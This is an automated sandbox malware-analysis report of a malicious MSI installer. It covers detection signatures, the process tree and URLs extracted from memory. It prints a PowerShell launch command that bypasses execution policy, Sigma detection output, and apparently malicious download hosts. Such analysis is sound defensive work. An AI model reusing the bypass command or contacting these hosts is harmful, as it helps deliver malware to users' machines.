Edit tour

Windows Analysis Report
ust_019821730-0576383.msi

Overview

General Information

Sample name:	ust_019821730-0576383.msi
Analysis ID:	1454459
MD5:	282d913070c0ea94546fc870d5760694
SHA1:	303885df9e9ad7411755fbf4affee6c7486967a2
SHA256:	c8445a8f19cb350c35894d209654041308c50bdeac5d8b1541361ef69b29e284
Tags:	msi
Infos:

Detection

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Multi AV Scanner detection for domain / URL

Multi AV Scanner detection for dropped file

Multi AV Scanner detection for submitted file

Yara detected MalDoc

Yara detected Powershell download and execute

Bypasses PowerShell execution policy

PE file contains section with special chars

Sigma detected: Script Interpreter Execution From Suspicious Folder

Sigma detected: Suspicious Script Execution From Temp Folder

Writes many files with high entropy

AV process strings found (often used to terminate AV products)

Abnormal high CPU Usage

Checks for available system drives (often done to infect USB drives)

Contains functionality for execution timing, often used to detect debuggers

Contains functionality to check if a debugger is running (IsDebuggerPresent)

Contains functionality to dynamically determine API calls

Contains functionality to query locales information (e.g. system language)

Contains functionality which may be used to detect a debugger (GetProcessHeap)

Contains long sleeps (>= 3 min)

Creates a process in suspended mode (likely to inject code)

Creates files inside the system directory

Deletes files inside the Windows folder

Detected potential crypto function

Dropped file seen in connection with other malware

Drops PE files

Drops PE files to the application program directory (C:\ProgramData)

Drops PE files to the windows directory (C:\Windows)

Enables debug privileges

Entry point lies outside standard sections

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Found dropped PE file which has not been started or loaded

Found large amount of non-executed APIs

Found potential string decryption / allocating functions

May sleep (evasive loops) to hinder dynamic analysis

One or more processes crash

PE file contains executable resources (Code or Archives)

PE file contains more sections than normal

PE file contains sections with non-standard names

Queries the volume information (name, serial number etc) of a device

Sample file is different than original file name gathered from version info

Sigma detected: Change PowerShell Policies to an Insecure Level

Sigma detected: Suspicious MsiExec Embedding Parent

Uses code obfuscation techniques (call, push, ret)

Very long cmdline option found, this is very uncommon (may be encrypted or packed)

Classification

Process Tree

System is w10x64

msiexec.exe (PID: 7420 cmdline: "C:\Windows\System32\msiexec.exe" /i "C:\Users\user\Desktop\ust_019821730-0576383.msi" MD5: E5DA170027542E25EDE42FC54C929077)

msiexec.exe (PID: 7456 cmdline: C:\Windows\system32\msiexec.exe /V MD5: E5DA170027542E25EDE42FC54C929077)

msiexec.exe (PID: 7516 cmdline: C:\Windows\syswow64\MsiExec.exe -Embedding C1A034EF7FF98EFA6F4BEBF9C4AEB420 MD5: 9D09DC1EDA745A5F87553048E57620CF)

powershell.exe (PID: 7644 cmdline: -NoProfile -Noninteractive -ExecutionPolicy Bypass -File "C:\Users\user\AppData\Local\Temp\pssE6C5.ps1" -propFile "C:\Users\user\AppData\Local\Temp\msiE6C1.txt" -scriptFile "C:\Users\user\AppData\Local\Temp\scrE6C2.ps1" -scriptArgsFile "C:\Users\user\AppData\Local\Temp\scrE6C3.txt" -propSep " :<->: " -lineSep " <<:>> " -testPrefix "_testValue." MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)

conhost.exe (PID: 7652 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

WebExperienceHostApp.exe (PID: 7808 cmdline: "C:\Users\user\AppData\Local\appData\WebExperienceHostApp.exe" MD5: 53AB9B8198E8AD8D3A043F40E72B1AB1)

chrome.exe (PID: 7916 cmdline: C:\ProgramData\Chrome\Application\118.0.5993.120\chrome.exe MD5: 1913EFB2223B24D2A47FAD0A1AAD8F19)

WerFault.exe (PID: 7208 cmdline: C:\Windows\system32\WerFault.exe -u -p 7916 -s 580 MD5: FD27D9F6D02763BDE32511B5DF7FF7A0)

cleanup

Yara Signatures

Initial Sample

Source	Rule	Description	Author	Strings
ust_019821730-0576383.msi	JoeSecurity_PowershellDownloadAndExecute	Yara detected Powershell download and execute	Joe Security
ust_019821730-0576383.msi	JoeSecurity_MalDoc	Yara detected MalDoc	Joe Security

Dropped Files

Source	Rule	Description	Author
C:\Config.Msi\67df31.rbs	JoeSecurity_PowershellDownloadAndExecute	Yara detected Powershell download and execute	Joe Security
C:\Windows\Installer\MSIE280.tmp	JoeSecurity_PowershellDownloadAndExecute	Yara detected Powershell download and execute	Joe Security
C:\Windows\Installer\67df2f.msi	JoeSecurity_PowershellDownloadAndExecute	Yara detected Powershell download and execute	Joe Security
C:\Windows\Installer\67df2f.msi	JoeSecurity_MalDoc	Yara detected MalDoc	Joe Security

Memory Dumps

Source	Rule	Description	Author	Strings
Process Memory Space: powershell.exe PID: 7644	JoeSecurity_PowershellDownloadAndExecute	Yara detected Powershell download and execute	Joe Security

Other

Source	Rule	Description	Author	Strings
amsi32_7644.amsi.csv	JoeSecurity_PowershellDownloadAndExecute	Yara detected Powershell download and execute	Joe Security

Sigma Signatures

System Summary

Sigma detected: Script Interpreter Execution From Suspicious Folder

Source: Process started

Author: Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems): Data: Command: -NoProfile -Noninteractive -ExecutionPolicy Bypass -File "C:\Users\user\AppData\Local\Temp\pssE6C5.ps1" -propFile "C:\Users\user\AppData\Local\Temp\msiE6C1.txt" -scriptFile "C:\Users\user\AppData\Local\Temp\scrE6C2.ps1" -scriptArgsFile "C:\Users\user\AppData\Local\Temp\scrE6C3.txt" -propSep " :<->: " -lineSep " <<:>> " -testPrefix "_testValue.", CommandLine: -NoProfile -Noninteractive -ExecutionPolicy Bypass -File "C:\Users\user\AppData\Local\Temp\pssE6C5.ps1" -propFile "C:\Users\user\AppData\Local\Temp\msiE6C1.txt" -scriptFile "C:\Users\user\AppData\Local\Temp\scrE6C2.ps1" -scriptArgsFile "C:\Users\user\AppData\Local\Temp\scrE6C3.txt" -propSep " :<->: " -lineSep " <<:>> " -testPrefix "_testValue.", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: C:\Windows\syswow64\MsiExec.exe -Embedding C1A034EF7FF98EFA6F4BEBF9C4AEB420, ParentImage: C:\Windows\SysWOW64\msiexec.exe, ParentProcessId: 7516, ParentProcessName: msiexec.exe, ProcessCommandLine: -NoProfile -Noninteractive -ExecutionPolicy Bypass -File "C:\Users\user\AppData\Local\Temp\pssE6C5.ps1" -propFile "C:\Users\user\AppData\Local\Temp\msiE6C1.txt" -scriptFile "C:\Users\user\AppData\Local\Temp\scrE6C2.ps1" -scriptArgsFile "C:\Users\user\AppData\Local\Temp\scrE6C3.txt" -propSep " :<->: " -lineSep " <<:>> " -testPrefix "_testValue.", ProcessId: 7644, ProcessName: powershell.exe

Sigma detected: Suspicious Script Execution From Temp Folder

Source: Process started

Author: Florian Roth (Nextron Systems), Max Altgelt (Nextron Systems), Tim Shelton: Data: Command: -NoProfile -Noninteractive -ExecutionPolicy Bypass -File "C:\Users\user\AppData\Local\Temp\pssE6C5.ps1" -propFile "C:\Users\user\AppData\Local\Temp\msiE6C1.txt" -scriptFile "C:\Users\user\AppData\Local\Temp\scrE6C2.ps1" -scriptArgsFile "C:\Users\user\AppData\Local\Temp\scrE6C3.txt" -propSep " :<->: " -lineSep " <<:>> " -testPrefix "_testValue.", CommandLine: -NoProfile -Noninteractive -ExecutionPolicy Bypass -File "C:\Users\user\AppData\Local\Temp\pssE6C5.ps1" -propFile "C:\Users\user\AppData\Local\Temp\msiE6C1.txt" -scriptFile "C:\Users\user\AppData\Local\Temp\scrE6C2.ps1" -scriptArgsFile "C:\Users\user\AppData\Local\Temp\scrE6C3.txt" -propSep " :<->: " -lineSep " <<:>> " -testPrefix "_testValue.", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: C:\Windows\syswow64\MsiExec.exe -Embedding C1A034EF7FF98EFA6F4BEBF9C4AEB420, ParentImage: C:\Windows\SysWOW64\msiexec.exe, ParentProcessId: 7516, ParentProcessName: msiexec.exe, ProcessCommandLine: -NoProfile -Noninteractive -ExecutionPolicy Bypass -File "C:\Users\user\AppData\Local\Temp\pssE6C5.ps1" -propFile "C:\Users\user\AppData\Local\Temp\msiE6C1.txt" -scriptFile "C:\Users\user\AppData\Local\Temp\scrE6C2.ps1" -scriptArgsFile "C:\Users\user\AppData\Local\Temp\scrE6C3.txt" -propSep " :<->: " -lineSep " <<:>> " -testPrefix "_testValue.", ProcessId: 7644, ProcessName: powershell.exe

Sigma detected: Change PowerShell Policies to an Insecure Level

Source: Process started

Author: frack113: Data: Command: -NoProfile -Noninteractive -ExecutionPolicy Bypass -File "C:\Users\user\AppData\Local\Temp\pssE6C5.ps1" -propFile "C:\Users\user\AppData\Local\Temp\msiE6C1.txt" -scriptFile "C:\Users\user\AppData\Local\Temp\scrE6C2.ps1" -scriptArgsFile "C:\Users\user\AppData\Local\Temp\scrE6C3.txt" -propSep " :<->: " -lineSep " <<:>> " -testPrefix "_testValue.", CommandLine: -NoProfile -Noninteractive -ExecutionPolicy Bypass -File "C:\Users\user\AppData\Local\Temp\pssE6C5.ps1" -propFile "C:\Users\user\AppData\Local\Temp\msiE6C1.txt" -scriptFile "C:\Users\user\AppData\Local\Temp\scrE6C2.ps1" -scriptArgsFile "C:\Users\user\AppData\Local\Temp\scrE6C3.txt" -propSep " :<->: " -lineSep " <<:>> " -testPrefix "_testValue.", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: C:\Windows\syswow64\MsiExec.exe -Embedding C1A034EF7FF98EFA6F4BEBF9C4AEB420, ParentImage: C:\Windows\SysWOW64\msiexec.exe, ParentProcessId: 7516, ParentProcessName: msiexec.exe, ProcessCommandLine: -NoProfile -Noninteractive -ExecutionPolicy Bypass -File "C:\Users\user\AppData\Local\Temp\pssE6C5.ps1" -propFile "C:\Users\user\AppData\Local\Temp\msiE6C1.txt" -scriptFile "C:\Users\user\AppData\Local\Temp\scrE6C2.ps1" -scriptArgsFile "C:\Users\user\AppData\Local\Temp\scrE6C3.txt" -propSep " :<->: " -lineSep " <<:>> " -testPrefix "_testValue.", ProcessId: 7644, ProcessName: powershell.exe

Sigma detected: Suspicious MsiExec Embedding Parent

Source: Process started

Sigma detected: Non Interactive PowerShell Process Spawned

Source: Process started

Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: -NoProfile -Noninteractive -ExecutionPolicy Bypass -File "C:\Users\user\AppData\Local\Temp\pssE6C5.ps1" -propFile "C:\Users\user\AppData\Local\Temp\msiE6C1.txt" -scriptFile "C:\Users\user\AppData\Local\Temp\scrE6C2.ps1" -scriptArgsFile "C:\Users\user\AppData\Local\Temp\scrE6C3.txt" -propSep " :<->: " -lineSep " <<:>> " -testPrefix "_testValue.", CommandLine: -NoProfile -Noninteractive -ExecutionPolicy Bypass -File "C:\Users\user\AppData\Local\Temp\pssE6C5.ps1" -propFile "C:\Users\user\AppData\Local\Temp\msiE6C1.txt" -scriptFile "C:\Users\user\AppData\Local\Temp\scrE6C2.ps1" -scriptArgsFile "C:\Users\user\AppData\Local\Temp\scrE6C3.txt" -propSep " :<->: " -lineSep " <<:>> " -testPrefix "_testValue.", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: C:\Windows\syswow64\MsiExec.exe -Embedding C1A034EF7FF98EFA6F4BEBF9C4AEB420, ParentImage: C:\Windows\SysWOW64\msiexec.exe, ParentProcessId: 7516, ParentProcessName: msiexec.exe, ProcessCommandLine: -NoProfile -Noninteractive -ExecutionPolicy Bypass -File "C:\Users\user\AppData\Local\Temp\pssE6C5.ps1" -propFile "C:\Users\user\AppData\Local\Temp\msiE6C1.txt" -scriptFile "C:\Users\user\AppData\Local\Temp\scrE6C2.ps1" -scriptArgsFile "C:\Users\user\AppData\Local\Temp\scrE6C3.txt" -propSep " :<->: " -lineSep " <<:>> " -testPrefix "_testValue.", ProcessId: 7644, ProcessName: powershell.exe

Snort Signatures

⊘No Snort rule has matched

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Multi AV Scanner detection for domain / URL

Source: http://pesterbdd.com/images/Pester.png

Virustotal: Detection: 10%

Perma Link

Multi AV Scanner detection for dropped file

Source: C:\Users\user\AppData\Local\appData\vcruntime140_1_app.dll

ReversingLabs: Detection: 41%

Multi AV Scanner detection for submitted file

Source: ust_019821730-0576383.msi	ReversingLabs: Detection: 28%
Source: ust_019821730-0576383.msi	Virustotal: Detection: 37%			Perma Link

Source:	Binary string: d:\a01\_work\3\s\\binaries\amd64ret\bin\amd64\\app\\vcomp140_app.amd64.pdb source: vcomp140_app.dll.1.dr
Source:	Binary string: C:\b\s\w\ir\cache\builder\src\out\Release_x64\initialexe\chrome.exe.pdb source: WebExperienceHostApp.exe, 00000005.00000003.1818415214.00007DF4929C0000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 00000007.00000000.1855768312.00007FF64586F000.00000002.00000001.01000000.0000000A.sdmp, chrome.exe, 00000007.00000002.2878824151.00007FF64586F000.00000002.00000001.01000000.0000000A.sdmp, chrome.exe.5.dr
Source:	Binary string: C:\ReleaseAI\win\Release\custact\x86\PowerShellScriptLauncher.pdb source: ust_019821730-0576383.msi, 67df31.rbs.1.dr
Source:	Binary string: C:\ReleaseAI\win\Release\custact\x86\PowerShellScriptLauncher.pdbg source: ust_019821730-0576383.msi, 67df31.rbs.1.dr
Source:	Binary string: C:\b\s\w\ir\cache\builder\src\out\Release_x64\chrome_pwa_launcher.exe.pdb source: WebExperienceHostApp.exe, 00000005.00000003.1825688488.00007DF4929C0000.00000004.00001000.00020000.00000000.sdmp, chrome_pwa_launcher.exe.5.dr
Source:	Binary string: d:\a01\_work\3\s\\binaries\amd64ret\bin\amd64\\app\\msvcp140_app.amd64.pdb source: WebExperienceHostApp.exe, 00000005.00000002.1866883936.00007FFDFBA95000.00000002.00000001.01000000.00000007.sdmp
Source:	Binary string: WebExperienceHostApp.pdb&& source: WebExperienceHostApp.exe, 00000005.00000002.1866720971.00007FF625A1A000.00000002.00000001.01000000.00000006.sdmp, WebExperienceHostApp.exe, 00000005.00000000.1805619880.00007FF625A1A000.00000002.00000001.01000000.00000006.sdmp, WebExperienceHostApp.exe.1.dr
Source:	Binary string: WebExperienceHostApp.pdb source: WebExperienceHostApp.exe, 00000005.00000002.1866720971.00007FF625A1A000.00000002.00000001.01000000.00000006.sdmp, WebExperienceHostApp.exe, 00000005.00000000.1805619880.00007FF625A1A000.00000002.00000001.01000000.00000006.sdmp, WebExperienceHostApp.exe.1.dr
Source:	Binary string: d:\a01\_work\3\s\\binaries\amd64ret\bin\amd64\\app\\vcruntime140_app.amd64.pdb source: WebExperienceHostApp.exe, 00000005.00000002.1867033119.00007FFE13211000.00000002.00000001.01000000.00000009.sdmp
Source:	Binary string: mrt100_app.pdb source: mrt100_app.dll.1.dr
Source:	Binary string: d:\a01\_work\3\s\\binaries\amd64ret\bin\amd64\\app\\vcomp140_app.amd64.pdbGCTL source: vcomp140_app.dll.1.dr
Source:	Binary string: C:\b\s\w\ir\cache\builder\src\out\Release_x64\vulkan-1.dll.pdb source: WebExperienceHostApp.exe, 00000005.00000003.1843609881.00007DF4929E0000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: B.pdb source: external_extensions_0000x.57.5.dr
Source:	Binary string: C:\ReleaseAI\win\Release\custact\x86\AICustAct.pdb source: ust_019821730-0576383.msi, MSIE184.tmp.1.dr, MSIE1F2.tmp.1.dr

Source: C:\Windows\System32\msiexec.exe	File opened: z:	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File opened: x:	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File opened: v:	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File opened: t:	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File opened: r:	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File opened: p:	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File opened: n:	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File opened: l:	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File opened: j:	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File opened: h:	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File opened: f:	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File opened: b:	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File opened: y:	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File opened: w:	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File opened: u:	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File opened: s:	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File opened: q:	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File opened: o:	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File opened: m:	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File opened: k:	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File opened: i:	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File opened: g:	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File opened: e:	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	File opened: c:	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File opened: a:	Jump to behavior

Source: C:\Users\user\AppData\Local\appData\WebExperienceHostApp.exe

Code function: 5_2_00007FFDFBA4A230 FindFirstFileExW,FindClose,wcscpy_s,_invalid_parameter_noinfo_noreturn,

5_2_00007FFDFBA4A230

Networking

Yara detected MalDoc

Source: Yara match	File source: ust_019821730-0576383.msi, type: SAMPLE
Source: Yara match	File source: C:\Windows\Installer\67df2f.msi, type: DROPPED

Source: powershell.exe, 00000003.00000002.1807784521.0000000004F3D000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://blob.cpq22prdstr01a.store.core.windows.net
Source: WebExperienceHostApp.exe, 00000005.00000003.1825688488.00007DF492A30000.00000004.00001000.00020000.00000000.sdmp, WebExperienceHostApp.exe, 00000005.00000003.1818415214.00007DF4929FD000.00000004.00001000.00020000.00000000.sdmp, WebExperienceHostApp.exe, 00000005.00000003.1843609881.00007DF4929E0000.00000004.00001000.00020000.00000000.sdmp, chrome_pwa_launcher.exe.5.dr, chrome.exe.5.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0E
Source: WebExperienceHostApp.exe, 00000005.00000003.1825688488.00007DF492A30000.00000004.00001000.00020000.00000000.sdmp, WebExperienceHostApp.exe, 00000005.00000003.1818415214.00007DF4929FD000.00000004.00001000.00020000.00000000.sdmp, WebExperienceHostApp.exe, 00000005.00000003.1843609881.00007DF4929E0000.00000004.00001000.00020000.00000000.sdmp, chrome_pwa_launcher.exe.5.dr, chrome.exe.5.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crt0
Source: WebExperienceHostApp.exe, 00000005.00000003.1825688488.00007DF492A30000.00000004.00001000.00020000.00000000.sdmp, WebExperienceHostApp.exe, 00000005.00000003.1818415214.00007DF4929FD000.00000004.00001000.00020000.00000000.sdmp, WebExperienceHostApp.exe, 00000005.00000003.1843609881.00007DF4929E0000.00000004.00001000.00020000.00000000.sdmp, chrome_pwa_launcher.exe.5.dr, chrome.exe.5.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crt0
Source: WebExperienceHostApp.exe, 00000005.00000003.1825688488.00007DF492A30000.00000004.00001000.00020000.00000000.sdmp, WebExperienceHostApp.exe, 00000005.00000003.1818415214.00007DF4929FD000.00000004.00001000.00020000.00000000.sdmp, WebExperienceHostApp.exe, 00000005.00000003.1843609881.00007DF4929E0000.00000004.00001000.00020000.00000000.sdmp, chrome_pwa_launcher.exe.5.dr, chrome.exe.5.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedRootG4.crt0C
Source: WebExperienceHostApp.exe, 00000005.00000003.1825688488.00007DF492A30000.00000004.00001000.00020000.00000000.sdmp, WebExperienceHostApp.exe, 00000005.00000003.1818415214.00007DF4929FD000.00000004.00001000.00020000.00000000.sdmp, WebExperienceHostApp.exe, 00000005.00000003.1843609881.00007DF4929E0000.00000004.00001000.00020000.00000000.sdmp, chrome_pwa_launcher.exe.5.dr, chrome.exe.5.dr	String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0
Source: WebExperienceHostApp.exe, 00000005.00000003.1825688488.00007DF492A30000.00000004.00001000.00020000.00000000.sdmp, WebExperienceHostApp.exe, 00000005.00000003.1818415214.00007DF4929FD000.00000004.00001000.00020000.00000000.sdmp, WebExperienceHostApp.exe, 00000005.00000003.1843609881.00007DF4929E0000.00000004.00001000.00020000.00000000.sdmp, chrome_pwa_launcher.exe.5.dr, chrome.exe.5.dr	String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crl0S
Source: WebExperienceHostApp.exe, 00000005.00000003.1825688488.00007DF492A30000.00000004.00001000.00020000.00000000.sdmp, WebExperienceHostApp.exe, 00000005.00000003.1818415214.00007DF4929FD000.00000004.00001000.00020000.00000000.sdmp, WebExperienceHostApp.exe, 00000005.00000003.1843609881.00007DF4929E0000.00000004.00001000.00020000.00000000.sdmp, chrome_pwa_launcher.exe.5.dr, chrome.exe.5.dr	String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crl0
Source: chrome.exe.5.dr	String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedRootG4.crl0
Source: WebExperienceHostApp.exe, 00000005.00000003.1825688488.00007DF492A30000.00000004.00001000.00020000.00000000.sdmp, WebExperienceHostApp.exe, 00000005.00000003.1818415214.00007DF4929FD000.00000004.00001000.00020000.00000000.sdmp, WebExperienceHostApp.exe, 00000005.00000003.1843609881.00007DF4929E0000.00000004.00001000.00020000.00000000.sdmp, chrome_pwa_launcher.exe.5.dr, chrome.exe.5.dr	String found in binary or memory: http://crl4.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crl0
Source: powershell.exe, 00000003.00000002.1811407355.00000000058BF000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://nuget.org/NuGet.exe
Source: WebExperienceHostApp.exe, 00000005.00000003.1825688488.00007DF492A30000.00000004.00001000.00020000.00000000.sdmp, WebExperienceHostApp.exe, 00000005.00000003.1818415214.00007DF4929FD000.00000004.00001000.00020000.00000000.sdmp, WebExperienceHostApp.exe, 00000005.00000003.1843609881.00007DF4929E0000.00000004.00001000.00020000.00000000.sdmp, chrome_pwa_launcher.exe.5.dr, chrome.exe.5.dr	String found in binary or memory: http://ocsp.digicert.com0
Source: WebExperienceHostApp.exe, 00000005.00000003.1825688488.00007DF492A30000.00000004.00001000.00020000.00000000.sdmp, WebExperienceHostApp.exe, 00000005.00000003.1818415214.00007DF4929FD000.00000004.00001000.00020000.00000000.sdmp, WebExperienceHostApp.exe, 00000005.00000003.1843609881.00007DF4929E0000.00000004.00001000.00020000.00000000.sdmp, chrome_pwa_launcher.exe.5.dr, chrome.exe.5.dr	String found in binary or memory: http://ocsp.digicert.com0A
Source: WebExperienceHostApp.exe, 00000005.00000003.1825688488.00007DF492A30000.00000004.00001000.00020000.00000000.sdmp, WebExperienceHostApp.exe, 00000005.00000003.1818415214.00007DF4929FD000.00000004.00001000.00020000.00000000.sdmp, WebExperienceHostApp.exe, 00000005.00000003.1843609881.00007DF4929E0000.00000004.00001000.00020000.00000000.sdmp, chrome_pwa_launcher.exe.5.dr, chrome.exe.5.dr	String found in binary or memory: http://ocsp.digicert.com0C
Source: WebExperienceHostApp.exe, 00000005.00000003.1825688488.00007DF492A30000.00000004.00001000.00020000.00000000.sdmp, WebExperienceHostApp.exe, 00000005.00000003.1818415214.00007DF4929FD000.00000004.00001000.00020000.00000000.sdmp, WebExperienceHostApp.exe, 00000005.00000003.1843609881.00007DF4929E0000.00000004.00001000.00020000.00000000.sdmp, chrome_pwa_launcher.exe.5.dr, chrome.exe.5.dr	String found in binary or memory: http://ocsp.digicert.com0X
Source: powershell.exe, 00000003.00000002.1807784521.00000000049A6000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://pesterbdd.com/images/Pester.png
Source: powershell.exe, 00000003.00000002.1807784521.0000000004851000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: Amcache.hve.13.dr	String found in binary or memory: http://upx.sf.net
Source: powershell.exe, 00000003.00000002.1807784521.0000000004F3D000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://webdocs75912232658.blob.core.windows.net
Source: powershell.exe, 00000003.00000002.1807784521.00000000049A6000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
Source: xmpp.dll.1.dr	String found in binary or memory: http://www.apachefriends.org/f/viewforum.php?f=16
Source: xmpp.dll.1.dr	String found in binary or memory: http://www.apachefriends.org/f/viewforum.php?f=4
Source: WebExperienceHostApp.exe, 00000005.00000003.1825688488.00007DF492A30000.00000004.00001000.00020000.00000000.sdmp, WebExperienceHostApp.exe, 00000005.00000003.1818415214.00007DF4929FD000.00000004.00001000.00020000.00000000.sdmp, WebExperienceHostApp.exe, 00000005.00000003.1843609881.00007DF4929E0000.00000004.00001000.00020000.00000000.sdmp, chrome_pwa_launcher.exe.5.dr, chrome.exe.5.dr	String found in binary or memory: http://www.digicert.com/CPS0
Source: WebExperienceHostApp.exe, WebExperienceHostApp.exe, 00000005.00000002.1864747200.0000000066677000.00000002.00000001.01000000.00000008.sdmp, WebExperienceHostApp.exe, 00000005.00000002.1865273677.000002594B27F000.00000004.00001000.00020000.00000000.sdmp, vcruntime140_1_app.dll.1.dr	String found in binary or memory: https://advocaciavirtualmw.com/ProcessosAbril/processojudiciario.gov.br
Source: WebExperienceHostApp.exe, 00000005.00000002.1865273677.000002594B215000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://advocaciavirtualmw.com/ProcessosAbril/processojudiciario.gov.brpY
Source: powershell.exe, 00000003.00000002.1807784521.0000000004851000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://aka.ms/pscore6lB
Source: powershell.exe, 00000003.00000002.1811407355.00000000058BF000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/
Source: powershell.exe, 00000003.00000002.1811407355.00000000058BF000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/Icon
Source: powershell.exe, 00000003.00000002.1811407355.00000000058BF000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/License
Source: WebExperienceHostApp.exe, 00000005.00000003.1818415214.00007DF4929C0000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 00000007.00000000.1855768312.00007FF64586F000.00000002.00000001.01000000.0000000A.sdmp, chrome.exe, 00000007.00000002.2878824151.00007FF64586F000.00000002.00000001.01000000.0000000A.sdmp, chrome.exe.5.dr	String found in binary or memory: https://crashpad.chromium.org/
Source: WebExperienceHostApp.exe, 00000005.00000003.1818415214.00007DF4929C0000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 00000007.00000000.1855768312.00007FF64586F000.00000002.00000001.01000000.0000000A.sdmp, chrome.exe, 00000007.00000002.2878824151.00007FF64586F000.00000002.00000001.01000000.0000000A.sdmp, chrome.exe.5.dr	String found in binary or memory: https://crashpad.chromium.org/bug/new
Source: WebExperienceHostApp.exe, 00000005.00000003.1818415214.00007DF4929C0000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 00000007.00000000.1855768312.00007FF64586F000.00000002.00000001.01000000.0000000A.sdmp, chrome.exe, 00000007.00000002.2878824151.00007FF64586F000.00000002.00000001.01000000.0000000A.sdmp, chrome.exe.5.dr	String found in binary or memory: https://crashpad.chromium.org/https://crashpad.chromium.org/bug/new
Source: powershell.exe, 00000003.00000002.1807784521.00000000049A6000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://github.com/Pester/Pester
Source: powershell.exe, 00000003.00000002.1807784521.0000000004F72000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://go.micro
Source: WebExperienceHostApp.exe, 00000005.00000002.1864747200.0000000066677000.00000002.00000001.01000000.00000008.sdmp, vcruntime140_1_app.dll.1.dr	String found in binary or memory: https://jaspreser.dev.br/.well-known/acme-challenge/Relatorios_xls_mensal
Source: powershell.exe, 00000003.00000002.1811407355.00000000058BF000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://nuget.org/nuget.exe
Source: powershell.exe, 00000003.00000002.1807784521.0000000004E84000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1807784521.00000000049A6000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://webdocs75912232658.blob.core.windows.net
